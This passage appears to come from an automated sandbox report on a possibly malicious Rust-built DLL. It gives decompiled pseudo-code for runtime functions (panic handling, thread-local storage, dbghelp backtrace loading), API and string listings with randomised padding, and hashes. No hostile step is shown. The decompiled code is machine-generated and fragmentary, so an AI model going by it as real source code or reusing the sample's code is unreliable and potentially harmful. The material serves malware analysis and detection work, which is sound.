					} else {
						E6ED395A0(_t264,  &M6ED5F8F7, 0x46, _t340,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6ed6d044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6ed6d044;
							_t202 = E6ED22960(_t264, 0x6ed6d044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6ed6d044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6ed6d044;
								_t203 = E6ED22960(_t264, 0x6ed6d044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6ed6e128; // 0x810000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6ed6d044;
										_t332 = _t205;
										_t206 =  *0x6ed6d044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6ED22960(_t264, 0x6ed6d044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6ED392F0(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6ed6e128, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6ed6e110;
											 *0x6ed6e110 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ed23290
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6ed6e128 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6ED1C640(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6ED395A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed5f860, 0x6ed5ff30);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6ED1C4D0(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6ED1C640(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ed6010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ed1dca0;
										_v60 =  &_v100;
										_v56 = 0x6ed1dca0;
										_v52 =  &_v148;
										_v48 = E6ED1DCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ED1D0F0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t245);
											}
											HeapFree( *0x6ed6e128, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed6e10c);
											_v68 = 0x6ed5fad0;
											_v64 = 1;
											_v152 = 0x6ed6e10c;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ED1DD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6ED1D0F0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed6e10c);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6ED1C640(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6ED1DA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed6e11c);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed6029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed5f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6ED1D0F0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6ED1D2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6ED1D290(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6ed6d040 = 0;
											_t356 =  *0x6ed6d040;
											if( *0x6ed6d040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ed6017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed5f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ED1D0F0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t235);
											}
											HeapFree( *0x6ed6e128, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6ED1D000: TlsGetValue.KERNEL32(00000000,00000001,6ED1C746), ref: 6ED1D00B
Part of subcall function 6ED1D000: TlsGetValue.KERNEL32(00000000), ref: 6ED1D043

AcquireSRWLockShared.KERNEL32(6ED6E11C), ref: 6ED1C785
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1C8DC
HeapFree.KERNEL32(00000000,?), ref: 6ED1C8EA
TlsGetValue.KERNEL32(00000000), ref: 6ED1C94D
TlsGetValue.KERNEL32(00000000), ref: 6ED1CA47
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1CB31
HeapFree.KERNEL32(00000000,?), ref: 6ED1CB3F
GetProcessHeap.KERNEL32 ref: 6ED1CC18
HeapAlloc.KERNEL32(00810000,00000000,00000010), ref: 6ED1CC2B
TlsSetValue.KERNEL32(00000000,00000000,00810000,00000000,00000010), ref: 6ED1CC9C
HeapFree.KERNEL32(00000000,00000000,00810000,00000000,00000010), ref: 6ED1CD1D

Strings

cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ED1C74D, 6ED1C7C8
already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6ED1CBE1
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ED1CC00
full, xrefs: 6ED1CCF8

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
API String ID: 2275035175-262129955
Opcode ID: bbf3c7538959b8ef0d44b11209ff677035f5c459abc4cf973998809cf79ac7e1
Instruction ID: 29d5bfc0d758e93d98bf65d97bc2dc98720fdb1e5898426b53c1bf40b777299f
Opcode Fuzzy Hash: bbf3c7538959b8ef0d44b11209ff677035f5c459abc4cf973998809cf79ac7e1
Instruction Fuzzy Hash: 971226B4A08219CFEB14CFE4D8947DEBBB5BB49308F204529D815AF380D775A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1E4E0, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6ED1E4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6ED239F0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6ed6e124; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6ed6e124], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6ed6e130; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6ed6e164 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6ed6e134; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6ed6e138; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6ed6e13c; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6ed6e164 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6ed6e130, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6ED394E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ed604bc);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6ed6e13c = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6ed6e130, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6ED394E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ed604ac);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6ed6e138 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6ED394E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ed6049c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6ED1E6D0(_v36);
								} else {
									_t38 = _t30;
									 *0x6ed6e134 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6ed6e130 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E520
LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E533
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6ED1E564
GetProcAddress.KERNEL32(SymSetOptions), ref: 6ED1E592
GetProcAddress.KERNEL32(SymInitializeW), ref: 6ED1E5C2
GetCurrentProcess.KERNEL32 ref: 6ED1E5D7
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E5F5
CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ED1E613

Part of subcall function 6ED1E6D0: ReleaseMutex.KERNEL32(?,6ED1E448), ref: 6ED1E6D1

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6ED1E651, 6ED1E674, 6ED1E697
Local\RustBacktraceMutex, xrefs: 6ED1E5EC
SymSetOptions, xrefs: 6ED1E587
SymGetOptions, xrefs: 6ED1E55E
SymInitializeW, xrefs: 6ED1E5B7
dbghelp.dll, xrefs: 6ED1E52E

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: 35c880cd57a1a3d9ff47c884aa3a6babb1882dcd82f9f58d69f18f9b105471c8
Instruction ID: 226949ca9a0a45ada4c71a90314f7694f6ae8f71b6d218d1a2a2f8d43c455fea
Opcode Fuzzy Hash: 35c880cd57a1a3d9ff47c884aa3a6babb1882dcd82f9f58d69f18f9b105471c8
Instruction Fuzzy Hash: EC41C271E046019FFF609BE59C547AA37B8AB46754F000938EC05AB7C1EB38D902C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ED1C6D0(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6ED239A0;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ed601dc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6ed6e120], esi");
				_t193 = E6ED1D000(_t268, 0x6ed601dc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6ED395A0(_t268,  &M6ED5F8F7, 0x46, _t349,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed5f570;
						_v120 = 0x6ed5f824;
						_v68 = 0x6ed60260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ED12470;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6ED1D0F0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6ed6e128, 0, _t259);
							}
							_t197 = HeapFree( *0x6ed6e128, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ed60224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed5f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6ED1D0F0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6ed6e11c);
					_v144 = 0x6ed6e11c;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6ED1D000(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6ed6e110; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6ED1D380(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6ED395A0(_t268,  &M6ED5F8F7, 0x46, _t352,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6ed6d044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6ed6d044;
							_t205 = E6ED22960(_t268, 0x6ed6d044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6ed6d044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6ed6d044;
								_t206 = E6ED22960(_t268, 0x6ed6d044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6ed6e128; // 0x810000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6ed6d044;
										_t340 = _t208;
										_t209 =  *0x6ed6d044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6ED22960(_t268, 0x6ed6d044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6ED392F0(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6ed6e128, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6ed6e110;
											 *0x6ed6e110 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ed23290
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6ed6e128 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6ED1C640(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6ED395A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed5f860, 0x6ed5ff30);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6ED1C4D0(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6ED1C640(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
